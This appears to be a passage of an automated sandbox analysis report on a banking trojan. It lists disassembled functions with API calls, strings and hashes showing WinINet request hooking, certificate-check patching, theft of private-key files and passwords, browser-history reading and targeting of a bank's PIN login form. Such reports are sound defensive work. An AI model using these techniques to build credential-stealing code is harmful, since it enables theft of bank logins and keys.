                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8091EC72A41204EFDB10DF68EC8CFAA7768FB89356F504755FA06DB281C771A911CBA0
                                                                                                                                                                                                              Function 02CB01A0 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 218COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB01BE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4055), ref: 02CB01EB
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB022D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB0233
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB023B
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB024C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB0253
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4055,?,?), ref: 02CB02C7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02CB0305
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashCreateDirectoryErrorLast$AdminFolderMakeSystemUsermemset
                                                                                                                                                                                                              • String ID: A23C4055$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$path.txt
                                                                                                                                                                                                              • API String ID: 2217318736-2931291103
                                                                                                                                                                                                              • Opcode ID: bf20a983780dcac52c3d887f99e9797eec772559cc9a083246e2363a9ad00a78
                                                                                                                                                                                                              • Instruction ID: ce363e298c2c9fdcdb6a6d9f824cf33e70105945c2d113fc566792f793167cdf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf20a983780dcac52c3d887f99e9797eec772559cc9a083246e2363a9ad00a78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87710A30A457155FDB228B349C5CBFB7BE4EF86381F444694E98AD7241DB70DA48C790
                                                                                                                                                                                                              Function 02CB1A60 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 185stringsynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CB1A83
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CB1A92
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CB1AA1
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED4A8), ref: 02CB1ACD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED4A8), ref: 02CB1B03
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02CB1B6C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB1B76
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB1B7E
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB1B8F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB1B96
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CB1BA3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 02CB1BCD
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02CB1BF2
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,02CA8A50), ref: 02CB1C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000006,00000010,00000000,00000000,00000000,00000000), ref: 02CB1C29
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 02CB1C33
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 02CB1C3E
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB1C45
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CB1C53
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB1C64
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorPathstrstr$BackslashCreateDirectoryErrorHandleLastMutex$AdminCloseConvertCurrentFolderFreeInfoInformationLocalMakeNamedReleaseSaclSleepStringSystemUser
                                                                                                                                                                                                              • String ID: &txtPin=$&txtSubId=$Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$S:(ML;;NRNWNX;;;LW)$ebank.laiki.com$pass.txt
                                                                                                                                                                                                              • API String ID: 532458909-2725162336
                                                                                                                                                                                                              • Opcode ID: d093cfc16d11a5284c94307fe0d616a3ff312a7a4bff382ad7966c00263e7bfa
                                                                                                                                                                                                              • Instruction ID: 6cee2442c22c8ea44d5c7b72f5c738784c5aaab4ce9168cb16ea16e5212a9b73
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d093cfc16d11a5284c94307fe0d616a3ff312a7a4bff382ad7966c00263e7bfa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7512E71A402096BDB159B789CA8BFF77ADEF85381F484554F94AD7100EBB0DA0587E0
                                                                                                                                                                                                              Function 02CA1190 Relevance: 45.6, APIs: 14, Strings: 12, Instructions: 137libraryloadermemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,74DEF550,00000000), ref: 02CA11AE
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02CA11C4
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,74DF1620), ref: 02CA11DC
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02CA11FE
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02CA120A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02CA1220
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02CA123C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02CA1258
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02CA1274
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02CA1290
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02CA12AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02CA12C8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02CA12E4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02CA1300
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                              • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                              • API String ID: 1705253364-835984666
                                                                                                                                                                                                              • Opcode ID: 7aa3811856bb493083e820c4b7d372ae1352aba49773c95f4d10de4f107d1491
                                                                                                                                                                                                              • Instruction ID: 2852f0d146cc69274154adc9eaca6b99d994d2e6625a89df496d000cc653265c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7aa3811856bb493083e820c4b7d372ae1352aba49773c95f4d10de4f107d1491
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4314D75B8171739FB2066654C26F6B239D5F40A88F180234F60BF2045EBE5E701997C
                                                                                                                                                                                                              Function 02CAF030 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 217filethreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02CAF05D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C40D7), ref: 02CAF09E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C40D7), ref: 02CAF0D2
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAF0E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAF0F1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAF0F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAF10A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAF111
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CAF14B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAF158
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C40D7,02CDFDB8,02CDFDB9), ref: 02CAF199
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAF1D4
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAF1DE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAF1E6
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAF1F7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAF1FE
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CAF23B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAF248
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAF420,02CDFDB8,00000000,00000000), ref: 02CAF27E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAF296
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAF2A7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                              • String ID: A23C40D7$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                              • API String ID: 448721894-436787560
                                                                                                                                                                                                              • Opcode ID: ac943cd80e02680d2876ac1feed1acab2e81def7df42fa4c88f2773591a600e2
                                                                                                                                                                                                              • Instruction ID: ee8267a0a3b8226f07b1211568147c621a4f9d06b876d75a71153d702f4033b6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac943cd80e02680d2876ac1feed1acab2e81def7df42fa4c88f2773591a600e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E714975A412169FDB11DF38DC68BEA7BE8EF85344F448698E989C7240DB71CA09CB90
                                                                                                                                                                                                              Function 02CAD26C Relevance: 42.3, APIs: 17, Strings: 7, Instructions: 259fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CAD278
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,found.), ref: 02CAD293
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,asus), ref: 02CAD2AE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CAD2D4
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAD30E
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAD318
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAD320
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAD32F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAD336
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB,?,?), ref: 02CAD3D9
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAD413
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAD41D
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAD425
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAD434
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAD43B
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02CAD52F
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 02CAD563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Error$LastPath$AdminBackslashCreateDirectoryFileFolderMakeSystemUser$AttributesFindModeNext
                                                                                                                                                                                                              • String ID: .txt$.zip$A23C41FB$asus$found.$keys$path
                                                                                                                                                                                                              • API String ID: 2233314381-1437551950
                                                                                                                                                                                                              • Opcode ID: e2dcc30b8c28339bef63b0d2332d4abc0a3dd69cafaacf298c830ba3daf1589a
                                                                                                                                                                                                              • Instruction ID: 69a1b86f295e8539f0556a2f2e2635375fcc828c6dee5e88703536bb26dc0ef1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2dcc30b8c28339bef63b0d2332d4abc0a3dd69cafaacf298c830ba3daf1589a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F91A3705097478FCB168B3494687ABBBE5AFC9349F488A58E8CBC7211EB31D609C791
                                                                                                                                                                                                              Function 02C94900 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 178fileregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02C94925
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C9494D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,74DF3490), ref: 02C94987
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C949A9
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C949B5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,IE history:,0000000C,02C958F1,00000000), ref: 02C949C9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C949D7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C949EB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C949F7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5C1C,00000001,00000000,00000000), ref: 02C94A0B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C94A19
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94A43
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94A4F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C94A64
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C94A74
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94A88
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94A94
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C94AA8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94AB6
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C94AD5
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02C94AEC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                              • API String ID: 757183407-427538202
                                                                                                                                                                                                              • Opcode ID: d4b0054f9edbd653c8fc9df547db2f0c867c72a688febebaa9a3a743e97f915f
                                                                                                                                                                                                              • Instruction ID: 0fcef97322e5274692c5a82a50696e7b20e6d9a8dadef635afe2b80d5c5ecf87
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4b0054f9edbd653c8fc9df547db2f0c867c72a688febebaa9a3a743e97f915f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4514C71A81304BBFB249B909C4AFEE7B7CEB45B45F504648F701EA1C0D7F05A458BA5
                                                                                                                                                                                                              Function 02CB4018 Relevance: 38.8, APIs: 17, Strings: 5, Instructions: 313COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB4037
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB4075
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB407F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB4087
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB4098
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB409F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,?), ref: 02CB40FD
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 02CB410C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB4137
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB4197
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C,?,00000000), ref: 02CB41D7
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB4237
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB4297
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorLast_snprintf$AdminAttributesCreateDirectoryFileFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                              • API String ID: 2433436401-604994656
                                                                                                                                                                                                              • Opcode ID: b8a3d2064a69a750f93ba15baedb86d1859791f238663ab11d0f3fc76be37d11
                                                                                                                                                                                                              • Instruction ID: 0261fc093d1f1af4749ef2fe4fe55e53939f77b950b021a05fd30e497d3bb939
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8a3d2064a69a750f93ba15baedb86d1859791f238663ab11d0f3fc76be37d11
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AB1FB30D0464A5BDF2BCB7898787FA7BE5BF89300F144A94E99AD7241DB719A48CB40
                                                                                                                                                                                                              Function 02C9DA20 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 192filesynchronizationmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02C9DA2D
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02C9DA3E
                                                                                                                                                                                                                • Part of subcall function 02C9D970: GetComputerNameA.KERNEL32(02CDF588,?), ref: 02C9D987
                                                                                                                                                                                                                • Part of subcall function 02C9D970: lstrlenA.KERNEL32(02CDF588,?,?,02CA76EC), ref: 02C9D992
                                                                                                                                                                                                                • Part of subcall function 02C9D970: wsprintfA.USER32 ref: 02C9D9D2
                                                                                                                                                                                                                • Part of subcall function 02C9D970: wsprintfA.USER32 ref: 02C9D9E2
                                                                                                                                                                                                                • Part of subcall function 02C9D970: wsprintfA.USER32 ref: 02C9D9F2
                                                                                                                                                                                                                • Part of subcall function 02C9D970: wsprintfA.USER32 ref: 02C9D9FF
                                                                                                                                                                                                                • Part of subcall function 02C9D970: wsprintfA.USER32 ref: 02C9DA0C
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CDF5A0), ref: 02C9DA6A
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C9DA83
                                                                                                                                                                                                                • Part of subcall function 02C99020: SetThreadDesktop.USER32(?,74DEF590,74DE16B0,?), ref: 02C9902F
                                                                                                                                                                                                                • Part of subcall function 02C99020: GetDC.USER32(00000000), ref: 02C99037
                                                                                                                                                                                                                • Part of subcall function 02C99020: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C99048
                                                                                                                                                                                                                • Part of subcall function 02C99020: GetDeviceCaps.GDI32(00000000,00000008), ref: 02C99059
                                                                                                                                                                                                                • Part of subcall function 02C99020: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C99070
                                                                                                                                                                                                                • Part of subcall function 02C99020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C990B2
                                                                                                                                                                                                                • Part of subcall function 02C99020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C990C2
                                                                                                                                                                                                                • Part of subcall function 02C99020: DeleteObject.GDI32(00000000), ref: 02C990C5
                                                                                                                                                                                                                • Part of subcall function 02C99020: ReleaseDC.USER32(00000000,00000000), ref: 02C990CE
                                                                                                                                                                                                                • Part of subcall function 02C99020: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C99129
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CDF54C), ref: 02C9DAB0
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C9DAC3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,02CDF670), ref: 02C9DAE1
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02C9DAFF
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02C9DB20
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(02CDF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02C9DB3D
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 02C9DB47
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C9DB61
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,02CDF630), ref: 02C9DB79
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02C9DB97
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000000,?), ref: 02C9DBB8
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(02CDF630,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02C9DBD5
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02C9DBDF
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C9DBFD
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C9DC10
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C9DC23
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,02CDF5DC), ref: 02C9DC39
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentThread.KERNEL32 ref: 02CB5940
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5947
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentProcess.KERNEL32(00000020,02CA4D1B,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5957
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB595E
                                                                                                                                                                                                                • Part of subcall function 02CB5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02CB5981
